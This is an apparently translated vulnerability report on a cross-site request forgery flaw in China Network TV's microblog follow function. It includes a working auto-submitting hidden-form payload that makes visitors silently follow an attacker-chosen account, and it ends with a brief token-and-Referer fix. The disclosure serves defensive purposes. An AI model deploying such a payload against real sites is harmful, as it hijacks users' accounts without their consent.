Official CSRF of China Network TV
Recently, I visited CNTV and found a csrf vulnerability. Then it is found that CNTV reffer has no effect on csrf.
Of course, you have not seen the token to defend against csrf.
It is mainly used to fl Weibo powder on the personal homepage.
1. I came to CNTV Weibo. I 'd like to pay attention to a female broadcaster first. Let's pick her up. I heard it was the host of the Spring Festival Gala. Thank you!
2. packet capture analysis. Haha, I didn't see the token field. Only the Reffer is available. Let's test whether the reffer has the csrf protection effect.
3. Create a hidden form by yourself to simulate user submission: Change the id to your 364190xx, so that others can "quietly" follow the landlord and click "fan"
POC:
<form method='post' action='http://t.cntv.cn/?m=api/weibo/action.createFriendship&_=142288703327'><input type='text' value='364190xx' name='uid' style='display:none!important;display:block;width=0;height=0' /><input type='text' value='0' name='type' style='display:none!important;display:block;width=0;height=0' /></form><script>document.forms[0].submit();</script>
4.html Save the page and use a kali host as an experiment.
Csrf successful
Error = 0 indicates success
The effect is as follows. You can see on the homepage that the victim is "Paying Attention" to himself.
Solution:
For csrf, add reffer and token Protection